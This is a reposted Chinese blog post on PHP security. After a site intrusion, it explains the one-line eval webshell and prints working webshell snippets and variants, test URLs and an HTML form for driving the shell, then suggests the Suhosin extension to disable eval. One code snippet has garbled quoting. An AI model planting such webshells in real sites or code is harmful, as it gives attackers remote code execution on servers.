【php安全】eval的禁止【转载】

前段时间，网站遭受了黑客的入侵，后来在排查中发现了一个php，里面的内容只有很少：

<?php eval($_POST[asda123131323156341]);?>

然后网上搜索一下php的eval函数，发现这个eval函数带有很大的安全隐患。

本地测试一下，在本地环境写一个php，内容如下：

default.php：

<?php eval($_GET[asda]);?>

然后访问一下：localhost/test/default.php?asda=phpinfo();

就可以看到已经把phpinfo给执行了。

或者是访问localhost/test/default.php?asda = echo 11111；同样也会发现1111被echo出来了。

类似的手段还有：

<?php $code="${${eval($_GET[c])}}";?>

访问localhost/test/default.php?c=phpinfo();即可看到

<?php

$code=addslashes($_GET[c]);

eval(""$code"");

?>

访问localhost/test/default.php?c=${${phpinfo()}};即可看到

利用可以执行php的eval函数，黑客可以用这个来上传一些后台木马，比如说上传php，然后通过url访问这个php来获得更大的权限。这种称为一句话木马的入侵。比如说：写一个html，内容如下：

<html>

<body>

<form action="default.php" method="post">

<input type="text" name="c" value="phpinfo();">

<input type="submit" value="submit">

</form>

</body>

</html>

然后写一个default.php，内容为：

<?php eval($_POST[c]);?>

这样的话，想执行什么php就可以直接提交运行即可。

所以：eval()对于php安全来说具有很大的杀伤力，eval函数减弱了你的应用的安全性,因此一般不用的情况下为了防止类似如下的一句话木马入侵，需要禁止！

然而网上很多说使用disable_functions禁止掉eval的方法都是错误的！

其实eval()是无法用php.ini中的disable_functions禁止掉的 ：

because eval() is a language construct and not a function

eval是zend的，因此不是PHP_FUNCTION 函数；

那么php怎么禁止eval呢？

如果想禁掉eval可以用php的扩展 Suhosin：

安装Suhosin后在php.ini中load进来Suhosin.so，再加上suhosin.executor.disable_eval = on即可！

总结,php的eval函数在php中是无法禁用的，因此我们也只有使用插件了！

至于安装suhosin来禁止eval函数的步骤为：（未测试）

原文来自：Linux下php安装suhosin

————————————————

版权声明：本文为CSDN博主「jiandanokok」的原创文章，遵循CC 4.0 BY-SA版权协议，转载请附上原文出处链接及本声明。

原文链接：https://blog.csdn.net/jiandanokok/java/article/details/51387940